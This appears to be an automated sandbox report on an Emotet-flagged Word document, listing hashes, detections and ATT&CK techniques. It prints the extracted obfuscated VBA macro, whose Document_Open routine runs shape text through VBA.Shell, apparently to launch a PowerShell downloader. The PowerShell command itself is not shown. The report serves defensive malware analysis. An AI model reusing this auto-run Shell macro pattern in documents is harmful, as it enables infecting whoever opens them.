Emotet Office (OLE) malware analysis — malicious · a8d0a54d290ed4ed

MALICIOUS

Office (OLE)

69.0 KB Created: 2018-11-09 11:37:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 87afd363f7d7bc6162d405843ec86b9f SHA-1: 9a54dd472d233a996f6abfec780bbceb7c211a8d SHA-256: a8d0a54d290ed4edddcc377b76ef243b13852889d9cf9f07d2f827d22649d3a1

230 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute a PowerShell command. This command is obfuscated but appears to download and execute a second-stage payload. The ClamAV detection and heuristic firings strongly indicate the Emotet family.

Heuristics 7

ClamAV: Doc.Malware.Emotet-6744894-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-6744894-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

   FormatDateTime (FUXkUk + JFQnok + JRmHp + MdSOMS) * LSRfPC + UBdMz
hJrJftTbTD = VBA.Shell(Shapes(XNWJRj + zYCOOcBI + 1 + qbqok + cDInZKo).TextFrame.TextRange.Text + FFsDBNXb + Nousz, AwIquaIua)
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1616 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1616 bytes
SHA-256: `869ad178e22e6b76ad71cc5b3db8815aace403a66da8a83e080c9e1218961595`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XmGQzKnDADs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function aHkFz() On Error Resume Next Const AwIquaIua = 772557782 - 772557782 FormatDateTime (CbcTF + iJMQw + oiulGc + mTwfSj) + bkiGw + KUzHc * LHzia + BzRlE + ddJzB + wJjjr FormatDateTime dpbtVO + lRQaf + iqrBdt + AjEUQa + rnmzrG + wHkFE FormatDateTime (FUXkUk + JFQnok + JRmHp + MdSOMS) * LSRfPC + UBdMz hJrJftTbTD = VBA.Shell(Shapes(XNWJRj + zYCOOcBI + 1 + qbqok + cDInZKo).TextFrame.TextRange.Text + FFsDBNXb + Nousz, AwIquaIua) End Function Private Sub Document_open() On Error Resume Next TimeValue (qGHRh + poIbB * (wXUBWR + zTocKG)) FormatNumber (TFiFFG + WnJrQ + sTjjj + pbRsN) FormatDateTime apDOtu + KWWijJ + KCMQb + CpFPlJ + UZXuSz + OmNiUj + sGttn + jjQjY + tikjnc + QclwcL * isYoiw + WKjMWz + zoIoVd + wiCZC TimeValue vKqWjc + XodfDX + NAOXw + UzcDO / dKziK + SkOiX + VdtfMk + Ywszof / (CFUvh + IQwoaG + WknAj + mBTWon - (LqXlKJ + pGNPS)) FormatDateTime (DcQXX + nqSwpQ) FormatDateTime NVOfLZ + Dbvovw / fhnth + ccjIYm + BdzKzU + anMVQ - rQZbd + BKJvXN + AJlpG + YaiZi + obtjsU + cLpMC aHkFz TimeValue kcfzCn + lJjFBV + KqjVh + wTLkZ - fqrLv + QQGZUz + tqZqT + iFKMv + nqFmQR + ajHpuw + SkEKkW + OnOXcr * (qPUiv + HwKip) TimeValue lpsiZw + TupwFN + vNqvqo + HaQaF + pLzikc + nlmrE + pHzuuP + lPcVH + (piiOb + ULKIz * (NdvEK + zqCzwI + WLAAZj + bXmjJX)) End Sub

SHA-256: 869ad178e22e6b76ad71cc5b3db8815aace403a66da8a83e080c9e1218961595

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XmGQzKnDADs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function aHkFz()
On Error Resume Next
Const AwIquaIua = 772557782 - 772557782
   FormatDateTime (CbcTF + iJMQw + oiulGc + mTwfSj) + bkiGw + KUzHc * LHzia + BzRlE + ddJzB + wJjjr
   FormatDateTime dpbtVO + lRQaf + iqrBdt + AjEUQa + rnmzrG + wHkFE
   FormatDateTime (FUXkUk + JFQnok + JRmHp + MdSOMS) * LSRfPC + UBdMz
hJrJftTbTD = VBA.Shell(Shapes(XNWJRj + zYCOOcBI + 1 + qbqok + cDInZKo).TextFrame.TextRange.Text + FFsDBNXb + Nousz, AwIquaIua)
End Function
Private Sub Document_open()
On Error Resume Next
   TimeValue (qGHRh + poIbB * (wXUBWR + zTocKG))
   FormatNumber (TFiFFG + WnJrQ + sTjjj + pbRsN)
   FormatDateTime apDOtu + KWWijJ + KCMQb + CpFPlJ + UZXuSz + OmNiUj + sGttn + jjQjY + tikjnc + QclwcL * isYoiw + WKjMWz + zoIoVd + wiCZC
   TimeValue vKqWjc + XodfDX + NAOXw + UzcDO / dKziK + SkOiX + VdtfMk + Ywszof / (CFUvh + IQwoaG + WknAj + mBTWon - (LqXlKJ + pGNPS))
   FormatDateTime (DcQXX + nqSwpQ)
   FormatDateTime NVOfLZ + Dbvovw / fhnth + ccjIYm + BdzKzU + anMVQ - rQZbd + BKJvXN + AJlpG + YaiZi + obtjsU + cLpMC
aHkFz
   TimeValue kcfzCn + lJjFBV + KqjVh + wTLkZ - fqrLv + QQGZUz + tqZqT + iFKMv + nqFmQR + ajHpuw + SkEKkW + OnOXcr * (qPUiv + HwKip)
   TimeValue lpsiZw + TupwFN + vNqvqo + HaQaF + pLzikc + nlmrE + pHzuuP + lPcVH + (piiOb + ULKIz * (NdvEK + zqCzwI + WLAAZj + bXmjJX))
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.